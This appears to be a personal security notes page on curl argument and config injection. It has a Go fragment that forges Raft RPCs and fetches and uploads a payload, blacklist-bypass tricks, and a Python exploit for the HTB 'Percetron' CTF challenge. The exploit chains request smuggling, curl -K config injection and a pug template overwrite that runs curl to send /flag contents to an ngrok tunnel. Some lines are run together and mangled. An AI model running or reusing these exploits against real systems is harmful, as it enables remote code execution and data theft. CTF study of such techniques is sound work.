		RPCHeader: RPCHeader{
			ProtocolVersion: 3,
			ID:              attackerID,
			Addr:            attackerAddr,
		},
		Term:         term,
		Leader:       attackerAddr,
		PrevLogEntry: 3,
		PrevLogTerm:  2,
		Entries: []Log{
			{
				Index: 4,
				Term:  term,
				Type:  0,
				Data:  cmdData,
			},
		},
		LeaderCommitIndex: 4,
	}

	var buf bytes.Buffer
	buf.WriteByte(rpcAppendEntries) // RPC type byte

	encoder := codec.NewEncoder(&buf, msgpackHandle)
	if err := encoder.Encode(req); err != nil {
		return nil, fmt.Errorf("encode failed: %v", err)
	}

	return buf.Bytes(), nil
}

// sendPayloadViaCurl downloads payload via HTTP, then uploads to target via telnet
func sendPayloadViaCurl(healthcheckURL, payloadServerAddr, payloadName, targetHost string, targetPort int) error {
	// Step 1: Download payload to /tmp/payload
	downloadURL := fmt.Sprintf("http://%s/%s", payloadServerAddr, payloadName)
	tmpFile := fmt.Sprintf("/tmp/payload_%s", payloadName)

	// Use ordered params to ensure --next comes first
	downloadParams := [][]string{
		{"-o", tmpFile},
		{"--output", tmpFile},
		{"--url", downloadURL},
	}

	if err := sendCurlInjection(healthcheckURL, downloadParams); err != nil {
		return fmt.Errorf("download failed: %v", err)
	}

	// Small delay to ensure file is written
	time.Sleep(100 * time.Millisecond)

	// Step 2: Upload via telnet
	telnetURL := fmt.Sprintf("telnet://%s:%d", targetHost, targetPort)

	uploadParams := [][]string{
		{"--upload-file", tmpFile},
		{"-T", tmpFile},
		{"--url", telnetURL},
		{"-m", "1"},
	}

	return sendCurlInjection(healthcheckURL, uploadParams)
}

func sendCurlInjection(healthcheckURL string, params [][]string) error {
	// Convert to map for JSON marshaling
	paramsMap := make(map[string]string)
	for _, pair := range params {
		paramsMap[pair[0]] = pair[1]
	}

	jsonData, err := json.Marshal(paramsMap)
	if err != nil {
		return fmt.Errorf("marshal params failed: %v", err)
	}

	resp, err := http.Post(healthcheckURL, "application/json", bytes.NewReader(jsonData))
	if err != nil {
		return fmt.Errorf("http request failed: %v", err)
	}
	defer resp.Body.Close()

we can use like {} below to bypass blacklist

subprocess.check_output(['curl','{h}ttps://google.com'])
subprocess.check_output(['curl','http[a-z:1]://google.com'])

curl -K ssrf?

in curl we can use -k option without any space to specify a curl config file

example in htbctf 2024 challenge percetron https://trixterthetux.notion.site/HTB-Cyber-Apocalypse-2024-web-Percetron-07e517143f9f4753941efc24b72640e1

curl config will ignore an giberish in start or end of a config file, ex you can see in writeup above

This means we can either hope that the random data before and after isn’t causing any issues, or we can make our username look something like this with the help of newlines in the username:

[random data we don't control]
next
url = "http://z77edtgff23vo0edvqsair2v0m6du4it.oastify.com"
output = "/tmp/trixter_was_here"
next
[random data we don't control]

![[Pasted image 20240315084518.png]] In this case we can use writelog of mongodb to get remote code execution via arbitary file write in pug template

from urllib.parse import urlparse
from flask import Flask, request
import httpx
from pwn import *from pyngrok import ngrok
URL = "http://83.136.252.114:50384"PORT = 4444TUNNEL = ngrok.connect(PORT, "http").public_url
print(TUNNEL)
class BaseAPI:
    def __init__(self, url=URL) -> None:
        self.c = httpx.Client(base_url=url)
    def panel_register(self, password, username):
        return self.c.post("/panel/register", data={
            "username": username,
            "password": password,
        })
    def panel_login(self, username, password):
        return self.c.post("/panel/login", data={
            "password": password,
            "username": username,
        })
    def panel_search(self, searchTerm, field):
        return self.c.post("/panel/search", data={
            "field": field,
            "searchTerm": searchTerm,
        })
    def healthcheck(self, url):
        return self.c.get("/healthcheck", params=dict(url=url))
    def get_panel_log(self):
        return self.c.get("/panel/login")
class API(BaseAPI):
    def dev_healthcheck(self, url):
        session = self.c.cookies.get('connect.sid')
        print("session:", session)
        raw_request = f"""GET /test HTTP/1.0Host: localhost:1337Connection: keep-alive:xContent-Length: 1000GET /healthcheck-dev?url={url} HTTP/1.1Host: localhost:1337Cookie: connect.sid={session}Connection: keep-aliveContent-Length: 0""".replace("\n", "\r\n").encode() + b"\r\n"*400        time.sleep(2)
        x = urlparse(URL)
        r = remote(x.hostname, x.port)
        r.send(raw_request)
        print(r.recvall())
        r.close()
def webServer(port, api: API):
    app = Flask(__name__)
    @app.get("/")
    def home():
        return f"""- import('child_process').then(process => process.execSync('curl -d "$(cat /flag*)" {TUNNEL}'))"""    @app.post("/")
    def p():
        print(request.form)
    return Thread(target=app.run, args=('0.0.0.0', port))
randstr = lambda x: ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(x))
if __name__ == "__main__":
    api = API()
    server = webServer(PORT, api)
    server.start()
    username = f"""nexturl = "{TUNNEL}"output = "/app/views/login.pug"next"""+randstr(6)
    password = randstr(32)
    res = api.panel_register(username=username, password=password)
    print(res.text)
    res = api.panel_login(username=username, password=password)
    print(res.text)
    time.sleep(2) # wait for the journal file to have our username    api.dev_healthcheck("-K/tmp/mongodb/journal/WiredTigerLog.0000000001")

Categories & Topics

This note is categorized under the following topics. Click on any category to explore more related content.

Share this note

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.